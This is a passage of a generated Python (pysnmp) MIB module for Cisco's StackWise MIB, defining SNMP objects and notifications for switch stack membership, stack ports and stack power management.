cswStackPowerNumMembers.setDescription('This object indicates the number of members in the power stack.') cswStackPowerType = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 1, 1, 6), CswPowerStackType()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPowerType.setStatus('current') if mibBuilder.loadTexts: cswStackPowerType.setDescription('This object indicates the topology of the power stack, that is, whether the switch is running in RING or STAR topology.') cswStackPowerName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 1, 1, 7), SnmpAdminString()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswStackPowerName.setStatus('current') if mibBuilder.loadTexts: cswStackPowerName.setDescription('This object specifies a unique name of this power stack. 
A zero-length string indicates no name is assigned.') cswStackPowerPortInfoTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 2), ) if mibBuilder.loadTexts: cswStackPowerPortInfoTable.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortInfoTable.setDescription('This table contains information about the stack power ports. There exists an entry in this table for each physical stack power port.') cswStackPowerPortInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 2, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex"), (0, "CISCO-STACKWISE-MIB", "cswStackPowerPortIndex")) if mibBuilder.loadTexts: cswStackPowerPortInfoEntry.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortInfoEntry.setDescription('A conceptual row in the cswStackPowerPortInfoTable. This entry contains information about a power stack port.') cswStackPowerPortIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 2, 1, 1), Unsigned32()) if mibBuilder.loadTexts: cswStackPowerPortIndex.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortIndex.setDescription('A unique value, greater than zero, for each stack power port.') cswStackPowerPortOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 2, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("enabled", 1), ("disabled", 2)))).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswStackPowerPortOperStatus.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortOperStatus.setDescription('This object is used to either set or unset the operational status of the stack port. 
This object will have following valid values, enabled(1) : The port is enabled disabled(2) : The port is forced down') cswStackPowerPortNeighborMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 2, 1, 3), MacAddress()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPowerPortNeighborMacAddress.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortNeighborMacAddress.setDescription("This objects indicates the port neighbor's Mac Address.") cswStackPowerPortNeighborSwitchNum = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 2, 1, 4), CswSwitchNumberOrZero()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPowerPortNeighborSwitchNum.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortNeighborSwitchNum.setDescription("This objects indicates the port neighbor's switch number. If either there is no switch connected or the neighbor is not Jack-Jack then the value of this object is going to be 0.") cswStackPowerPortLinkStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 2, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("up", 1), ("down", 2)))).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPowerPortLinkStatus.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortLinkStatus.setDescription('This object is used to describe the link status of the stack port. This object will have following valid values, up(1) : The port is connected and operational down(2): The port is either forced down or not connected') cswStackPowerPortOverCurrentThreshold = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 2, 1, 6), Unsigned32()).setUnits('Amperes').setMaxAccess("readwrite") if mibBuilder.loadTexts: cswStackPowerPortOverCurrentThreshold.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortOverCurrentThreshold.setDescription('This object is used to retrieve the over current threshold. 
The stack power cables are limited to carry current up to the limit retrieved by this object. The stack power cables would not be able to function properly if either the input or output current goes beyond the threshold retrieved by this object.') cswStackPowerPortName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 3, 2, 1, 7), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPowerPortName.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortName.setDescription('This object specifies a unique name of the stack power port as shown on the face plate of the system. A zero-length string indicates no name is assigned.') cswEnableStackNotifications = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 1, 4), TruthValue()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswEnableStackNotifications.setStatus('deprecated') if mibBuilder.loadTexts: cswEnableStackNotifications.setDescription("This object indicates whether the system generates the notifications defined in this MIB or not. 
A value of 'false' will prevent the notifications from being sent.") cswEnableIndividualStackNotifications = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 1, 5), Bits().clone(namedValues=NamedValues(("stackPortChange", 0), ("stackNewMaster", 1), ("stackMismatch", 2), ("stackRingRedundant", 3), ("stackNewMember", 4), ("stackMemberRemoved", 5), ("stackPowerLinkStatusChanged", 6), ("stackPowerPortOperStatusChanged", 7), ("stackPowerVersionMismatch", 8), ("stackPowerInvalidTopology", 9), ("stackPowerBudgetWarning", 10), ("stackPowerInvalidInputCurrent", 11), ("stackPowerInvalidOutputCurrent", 12), ("stackPowerUnderBudget", 13), ("stackPowerUnbalancedPowerSupplies", 14), ("stackPowerInsufficientPower", 15), ("stackPowerPriorityConflict", 16), ("stackPowerUnderVoltage", 17), ("stackPowerGLS", 18), ("stackPowerILS", 19), ("stackPowerSRLS", 20), ("stackPowerSSLS", 21), ("stackMemberToBeReloadedForUpgrade", 22)))).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswEnableIndividualStackNotifications.setStatus('current') if mibBuilder.loadTexts: cswEnableIndividualStackNotifications.setDescription('This object is used to enable/disable individual notifications defined in this MIB module. Turning on a particular bit would enable the corresponding trap and, similarly, turning off a particular bit would disable the corresponding trap. The following notifications are controlled by this object: stackPortChange(0): enables/disables cswStackPortChange notification. stackNewMaster(1): enables/disables cswStackNewMember notification. stackMismatch(2): enables/disables cswStackMismatch notification. stackRingRedundant(3): enables/disables cswStackRingRedundant notification. stackNewMember(4): enables/disables cswStackNewMember notification. stackMemberRemoved(5): enables/disables cswStackMemberRemoved notification. stackPowerLinkStatusChanged(6): enables/disables cswStackPowerPortLinkStatusChanged notification. 
stackPowerPortOperStatusChanged(7): enables/disables cswStackPowerPortOperStatusChanged notification. stackPowerVersionMismatch(8): enables/disables cswStackPowerVersionMismatch notification. stackPowerInvalidTopology(9): enables/disables cswStackPowerInvalidTopology notification stackPowerBudgetWarning(10): enables/disables cswStackPowerBudgetWarning notification. stackPowerInvalidInputCurrent(11): enables/disables cswStackPowerInvalidInputCurrent notification. stackPowerInvalidOutputCurrent(12): enables/disables cswStackPowerInvalidOutputCurrent notification. stackPowerUnderBudget(13): enables/disables cswStackPowerUnderBudget notification. stackPowerUnbalancedPowerSupplies(14): enables/disables cswStackPowerUnbalancedPowerSupplies notification. stackPowerInsufficientPower(15): enables/disables cswStackPowerInsufficientPower notification. stackPowerPriorityConflict(16): enables/disables cswStackPowerPriorityConflict notification. stackPowerUnderVoltage(17): enables/disables cswStackPowerUnderVoltage notification. stackPowerGLS(18): enables/disables cswStackPowerGLS notification. stackPowerILS(19): enables/disabled cswStackPowerILS notification. stackPowerSRLS(20): enables/disables cswStackPowerSRLS notification. stackPowerSSLS(21): enables/disables cswStackPowerSSLS notification. 
stackMemberToBeReloadedForUpgrade(22): enables/disables cswStackMemberToBeReloadedForUpgrade notification.') cswStackDomainNum = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 1, 6), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackDomainNum.setStatus('current') if mibBuilder.loadTexts: cswStackDomainNum.setDescription('This object indicates distributed domain of the switch.Only Switches with the same domain number can be in the same dist ributed domain.0 means no switch domain configured.') cswStackType = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 1, 7), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackType.setStatus('current') if mibBuilder.loadTexts: cswStackType.setDescription('This object indicates type of switch stack. value of Switch virtual domain determines if switch is distributed or conventional stack. 0 means stack is conventional back side stack.') cswStackBandWidth = MibScalar((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 1, 8), Unsigned32()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackBandWidth.setStatus('current') if mibBuilder.loadTexts: cswStackBandWidth.setDescription('This object indicates stack bandwidth.') cswSwitchInfoTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1), ) if mibBuilder.loadTexts: cswSwitchInfoTable.setStatus('current') if mibBuilder.loadTexts: cswSwitchInfoTable.setDescription("This table contains information specific to switches in a stack. 
Every switch with an entry in the entPhysicalTable (ENTITY-MIB) whose entPhysicalClass is 'chassis' will have an entry in this table.") cswSwitchInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex")) if mibBuilder.loadTexts: cswSwitchInfoEntry.setStatus('current') if mibBuilder.loadTexts: cswSwitchInfoEntry.setDescription('A conceptual row in the cswSwitchInfoTable describing a switch information.') cswSwitchNumCurrent = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 1), CswSwitchNumber()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswSwitchNumCurrent.setStatus('current') if mibBuilder.loadTexts: cswSwitchNumCurrent.setDescription("This object contains the current switch identification number. This number should match any logical labeling on the switch. For example, a switch whose interfaces are labeled 'interface #3' this value should be 3.") cswSwitchNumNextReload = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 2), CswSwitchNumberOrZero()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswSwitchNumNextReload.setStatus('current') if mibBuilder.loadTexts: cswSwitchNumNextReload.setDescription("This object contains the cswSwitchNumCurrent to be used at next reload. The maximum value for this object is defined by the cswMaxSwitchNum object. Note: This object will contain 0 and cannot be set if the cswSwitchState value is other than 'ready'.") cswSwitchRole = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("master", 1), ("member", 2), ("notMember", 3), ("standby", 4)))).setMaxAccess("readonly") if mibBuilder.loadTexts: cswSwitchRole.setStatus('current') if mibBuilder.loadTexts: cswSwitchRole.setDescription('This object describes the function of the switch: master - stack master. member - active member of the stack. 
notMember - none-active stack member, see cswSwitchState for status. standby - stack standby switch.') cswSwitchSwPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 4), CswSwitchPriority()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswSwitchSwPriority.setStatus('current') if mibBuilder.loadTexts: cswSwitchSwPriority.setDescription("A number containing the priority of a switch. The switch with the highest priority will become the master. The maximum value for this object is defined by the cswMaxSwitchConfigPriority object. If after a reload the value of cswMaxSwitchConfigPriority changes to a smaller value, and the value of cswSwitchSwPriority has been previously set to a value greater or equal to the new cswMaxSwitchConfigPriority, then the SNMP agent must set cswSwitchSwPriority to the new cswMaxSwitchConfigPriority. Note: This object will contain the value of 0 if the cswSwitchState value is other than 'ready'.") cswSwitchHwPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 5), CswSwitchPriority()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswSwitchHwPriority.setStatus('current') if mibBuilder.loadTexts: cswSwitchHwPriority.setDescription("This object contains the hardware priority of a switch. If two or more entries in this table have the same cswSwitchSwPriority value during the master election time, the switch with the highest cswSwitchHwPriority will become the master. 
Note: This object will contain the value of 0 if the cswSwitchState value is other than 'ready'.") cswSwitchState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11))).clone(namedValues=NamedValues(("waiting", 1), ("progressing", 2), ("added", 3), ("ready", 4), ("sdmMismatch", 5), ("verMismatch", 6), ("featureMismatch", 7), ("newMasterInit", 8), ("provisioned", 9), ("invalid", 10), ("removed", 11)))).setMaxAccess("readonly") if mibBuilder.loadTexts: cswSwitchState.setStatus('current') if mibBuilder.loadTexts: cswSwitchState.setDescription("The current state of a switch: waiting - Waiting for a limited time on other switches in the stack to come online. progressing - Master election or mismatch checks in progress. added - The switch is added to the stack. ready - The switch is operational. sdmMismatch - The SDM template configured on the master is not supported by the new member. verMismatch - The operating system version running on the master is different from the operating system version running on this member. featureMismatch - Some of the features configured on the master are not supported on this member. newMasterInit - Waiting for the new master to finish initialization after master switchover (Master Re-Init). provisioned - The switch is not an active member of the stack. invalid - The switch's state machine is in an invalid state. removed - The switch is removed from the stack.") cswSwitchMacAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 7), MacAddress()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswSwitchMacAddress.setStatus('current') if mibBuilder.loadTexts: cswSwitchMacAddress.setDescription("The MAC address of the switch. 
Note: This object will contain the value of 0000:0000:0000 if the cswSwitchState value is other than 'ready'.") cswSwitchSoftwareImage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 8), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswSwitchSoftwareImage.setStatus('current') if mibBuilder.loadTexts: cswSwitchSoftwareImage.setDescription("The software image type running on the switch. Note: This object will contain an empty string if the cswSwitchState value is other than 'ready'.") cswSwitchPowerBudget = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 9), Unsigned32()).setUnits('Watts').setMaxAccess("readonly") if mibBuilder.loadTexts: cswSwitchPowerBudget.setStatus('current') if mibBuilder.loadTexts: cswSwitchPowerBudget.setDescription('This object indicates the power budget of the switch.') cswSwitchPowerCommited = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 10), Unsigned32()).setUnits('Watts').setMaxAccess("readonly") if mibBuilder.loadTexts: cswSwitchPowerCommited.setStatus('current') if mibBuilder.loadTexts: cswSwitchPowerCommited.setDescription('This object indicates the power committed to the POE devices connected to the switch.') cswSwitchSystemPowerPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 11), Unsigned32()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswSwitchSystemPowerPriority.setStatus('current') if mibBuilder.loadTexts: cswSwitchSystemPowerPriority.setDescription("This specifies the system's power priority. 
In case of a power failure then the system with the highest system priority will be brought down last.") cswSwitchPoeDevicesLowPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 12), Unsigned32()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswSwitchPoeDevicesLowPriority.setStatus('current') if mibBuilder.loadTexts: cswSwitchPoeDevicesLowPriority.setDescription("This object specifies the priority of the system's low priority POE devices.") cswSwitchPoeDevicesHighPriority = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 13), Unsigned32()).setMaxAccess("readwrite") if mibBuilder.loadTexts: cswSwitchPoeDevicesHighPriority.setStatus('current') if mibBuilder.loadTexts: cswSwitchPoeDevicesHighPriority.setDescription("This object specifies the priority of the system's high priority POE devices. In order to avoid losing the high priority POE devices before the low priority POE devices, this object's value must be greater than value of cswSwitchPoeDevicesLowPriority.") cswSwitchPowerAllocated = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 1, 1, 14), Unsigned32()).setUnits('Watts').setMaxAccess("readonly") if mibBuilder.loadTexts: cswSwitchPowerAllocated.setStatus('current') if mibBuilder.loadTexts: cswSwitchPowerAllocated.setDescription('This object indicates the power committed to the POE devices connected to the switch.') cswStackPortInfoTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 2), ) if mibBuilder.loadTexts: cswStackPortInfoTable.setStatus('current') if mibBuilder.loadTexts: cswStackPortInfoTable.setDescription('This table contains stackport specific information. 
There exists an entry in this table for every physical stack port that have an entry in the ifTable (IF-MIB).') cswStackPortInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 2, 1), ).setIndexNames((0, "IF-MIB", "ifIndex")) if mibBuilder.loadTexts: cswStackPortInfoEntry.setStatus('current') if mibBuilder.loadTexts: cswStackPortInfoEntry.setDescription('A conceptual row in the cswStackPortInfoTable. An entry contains information about a stackport.') cswStackPortOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 2, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("up", 1), ("down", 2), ("forcedDown", 3)))).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPortOperStatus.setStatus('current') if mibBuilder.loadTexts: cswStackPortOperStatus.setDescription('The state of the stackport. up - Connected and operational. down - Not connected to a neighboring switch or administrative down. forcedDown - Shut down by stack manager due to mismatch or stackport errors.') cswStackPortNeighbor = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 2, 1, 2), EntPhysicalIndexOrZero()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswStackPortNeighbor.setStatus('current') if mibBuilder.loadTexts: cswStackPortNeighbor.setDescription("This object contains the value of the entPhysicalIndex of the switch's chassis to which this stackport is connected to. 
If the stackport is not connected, the value 0 is returned.") cswDistrStackLinkInfoTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 3), ) if mibBuilder.loadTexts: cswDistrStackLinkInfoTable.setStatus('current') if mibBuilder.loadTexts: cswDistrStackLinkInfoTable.setDescription('Distributed Stack Link Information.') cswDistrStackLinkInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 3, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex"), (0, "CISCO-STACKWISE-MIB", "cswDSLindex")) if mibBuilder.loadTexts: cswDistrStackLinkInfoEntry.setStatus('current') if mibBuilder.loadTexts: cswDistrStackLinkInfoEntry.setDescription('An Entry containing information about DSL link.') cswDSLindex = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 3, 1, 1), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(1, 2))) if mibBuilder.loadTexts: cswDSLindex.setStatus('current') if mibBuilder.loadTexts: cswDSLindex.setDescription('This is index of the distributed stack link with respect to each interface port') cswDistrStackLinkBundleOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 3, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("up", 1), ("down", 2)))).setMaxAccess("readonly") if mibBuilder.loadTexts: cswDistrStackLinkBundleOperStatus.setStatus('current') if mibBuilder.loadTexts: cswDistrStackLinkBundleOperStatus.setDescription('The state of the stackLink. up - Connected and operational. 
down - Not connected or administrative down.') cswDistrStackPhyPortInfoTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 4), ) if mibBuilder.loadTexts: cswDistrStackPhyPortInfoTable.setStatus('current') if mibBuilder.loadTexts: cswDistrStackPhyPortInfoTable.setDescription('This table contains objects for Distributed stack Link information Table.') cswDistrStackPhyPortInfoEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 4, 1), ).setIndexNames((0, "ENTITY-MIB", "entPhysicalIndex"), (0, "CISCO-STACKWISE-MIB", "cswDSLindex"), (0, "IF-MIB", "ifIndex")) if mibBuilder.loadTexts: cswDistrStackPhyPortInfoEntry.setStatus('current') if mibBuilder.loadTexts: cswDistrStackPhyPortInfoEntry.setDescription('An Entry containing information about stack port that is part of Distributed Stack Link.') cswDistrStackPhyPort = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 4, 1, 1), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswDistrStackPhyPort.setStatus('current') if mibBuilder.loadTexts: cswDistrStackPhyPort.setDescription('This object indicates the name of distributed stack port.') cswDistrStackPhyPortOperStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 4, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("up", 1), ("down", 2)))).setMaxAccess("readonly") if mibBuilder.loadTexts: cswDistrStackPhyPortOperStatus.setStatus('current') if mibBuilder.loadTexts: cswDistrStackPhyPortOperStatus.setDescription('The state of the distributed stackport. up - Connected and operational. 
down - Not connected to a neighboring switch or administrative down.') cswDistrStackPhyPortNbr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 4, 1, 3), SnmpAdminString()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswDistrStackPhyPortNbr.setStatus('current') if mibBuilder.loadTexts: cswDistrStackPhyPortNbr.setDescription("This object indicates the name of distributed stack port's neighbor.") cswDistrStackPhyPortNbrsw = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 500, 1, 2, 4, 1, 4), EntPhysicalIndexOrZero()).setMaxAccess("readonly") if mibBuilder.loadTexts: cswDistrStackPhyPortNbrsw.setStatus('current') if mibBuilder.loadTexts: cswDistrStackPhyPortNbrsw.setDescription("This object indicates the EntPhysicalIndex of the distributed stack port's neigbor switch.") cswMIBNotifications = MibIdentifier((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0)) cswStackPortChange = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 1)).setObjects(("IF-MIB", "ifIndex"), ("CISCO-STACKWISE-MIB", "cswStackPortOperStatus"), ("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackPortChange.setStatus('current') if mibBuilder.loadTexts: cswStackPortChange.setDescription('This notification is generated when the state of a stack port has changed.') cswStackNewMaster = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 2)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackNewMaster.setStatus('current') if mibBuilder.loadTexts: cswStackNewMaster.setDescription('This notification is generated when a new master has been elected. 
The notification will contain the cswSwitchNumCurrent object to indicate the new master ID.') cswStackMismatch = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 3)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchState"), ("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackMismatch.setStatus('current') if mibBuilder.loadTexts: cswStackMismatch.setDescription('This notification is generated when a new member attempt to join the stack but was denied due to a mismatch. The cswSwitchState object will indicate the type of mismatch.') cswStackRingRedundant = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 4)).setObjects(("CISCO-STACKWISE-MIB", "cswRingRedundant")) if mibBuilder.loadTexts: cswStackRingRedundant.setStatus('current') if mibBuilder.loadTexts: cswStackRingRedundant.setDescription('This notification is generated when the redundancy of the ring has changed.') cswStackNewMember = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 5)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackNewMember.setStatus('current') if mibBuilder.loadTexts: cswStackNewMember.setDescription('This notification is generated when a new member joins the stack.') cswStackMemberRemoved = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 6)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackMemberRemoved.setStatus('current') if mibBuilder.loadTexts: cswStackMemberRemoved.setDescription('This notification is generated when a member is removed from the stack.') cswStackPowerPortLinkStatusChanged = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 7)).setObjects(("CISCO-STACKWISE-MIB", "cswStackPowerPortLinkStatus"), ("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortName")) if mibBuilder.loadTexts: cswStackPowerPortLinkStatusChanged.setStatus('current') if mibBuilder.loadTexts: 
cswStackPowerPortLinkStatusChanged.setDescription('This notification is generated when the link status of a stack power port is changed from up to down or down to up. This notification is for informational purposes only and no action is required. cswStackPowerPortLinkStatus indicates link status of the stack power ports. cswSwitchNumCurrent indicates the switch number of the system. cswStackPowerPortName specifies a unique name of the stack power port as shown on the face plate of the system.') cswStackPowerPortOperStatusChanged = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 8)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortOperStatus"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortName")) if mibBuilder.loadTexts: cswStackPowerPortOperStatusChanged.setStatus('current') if mibBuilder.loadTexts: cswStackPowerPortOperStatusChanged.setDescription('This notification is generated when the operational status of a stack power port is changed from enabled to disabled or from disabled to enabled. This notification is for informational purposes only and no action is required. cswSwitchNumCurrent indicates the switch number of the system. cswStackPowerPortOperStatus indicates operational status of the stack power ports. cswStackPowerPortName specifies a unique name of the stack power port as shown on the face plate of the system.') cswStackPowerVersionMismatch = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 9)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackPowerVersionMismatch.setStatus('current') if mibBuilder.loadTexts: cswStackPowerVersionMismatch.setDescription('This notification is generated when the major version of the stack power protocol is different from the other members of the power stack. Upon receiving this notification, the user should make sure that he/she is using the same software version on all the members of the same power stack. 
cswSwitchNumCurrent indicates the switch number of the system seeing the power stack version mismatch.') cswStackPowerInvalidTopology = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 10)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackPowerInvalidTopology.setStatus('current') if mibBuilder.loadTexts: cswStackPowerInvalidTopology.setDescription('This notification is generated when an invalid stack power topology is discovered by a switch. cswSwitchNumCurrent indicates the switch number of the system where the invalid topology is discovered.') cscwStackPowerBudgetWarrning = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 11)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cscwStackPowerBudgetWarrning.setStatus('current') if mibBuilder.loadTexts: cscwStackPowerBudgetWarrning.setDescription('This notification is generated when the switch power budget is more than 1000W above its power supplies rated power output. cswSwitchNumCurrent indicates the switch number of the system where the invalid power budget has been detected.') cswStackPowerInvalidInputCurrent = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 12)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortOverCurrentThreshold"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortName")) if mibBuilder.loadTexts: cswStackPowerInvalidInputCurrent.setStatus('current') if mibBuilder.loadTexts: cswStackPowerInvalidInputCurrent.setDescription('This notification is generated when the input current in the stack power cable is over the limit of the threshold retrieved by the agent through cswStackPowerPortOverCurrentThreshold object. Upon receiving this notification, the user should add a power supply to the system whose switch number is generated with this notification. cswSwitchNumCurrent indicates the switch number of the system. 
cswStackPowerPortOverCurrentThreshold indicates the over current threshold of power stack cables. cswStackPowerPortName specifies a unique name of the stack power port as shown on the face plate of the system.') cswStackPowerInvalidOutputCurrent = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 13)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortOverCurrentThreshold"), ("CISCO-STACKWISE-MIB", "cswStackPowerPortName")) if mibBuilder.loadTexts: cswStackPowerInvalidOutputCurrent.setStatus('current') if mibBuilder.loadTexts: cswStackPowerInvalidOutputCurrent.setDescription('This notification is generated when the output current in the stack power cable is over the limit of the threshold retrieved by the agent through cswStackPowerPortOverCurrentThreshold object. Upon receiving this notification, the user should remove a power supply from the system whose switch number is generated with this notification. cswSwitchNumCurrent indicates the switch number of the system. cswStackPowerPortOverCurrentThreshold indicates the over current threshold of power stack cables. cswStackPowerPortName specifies a unique name of the stack power port as shown on the face plate of the system.') cswStackPowerUnderBudget = NotificationType((1, 3, 6, 1, 4, 1, 9, 9, 500, 0, 0, 14)).setObjects(("CISCO-STACKWISE-MIB", "cswSwitchNumCurrent")) if mibBuilder.loadTexts: cswStackPowerUnderBudget.setStatus('current') if mibBuilder.loadTexts: cswStackPowerUnderBudget.setDescription("This notification is generated when the switch's budget is less than maximum possible switch power consumption. 
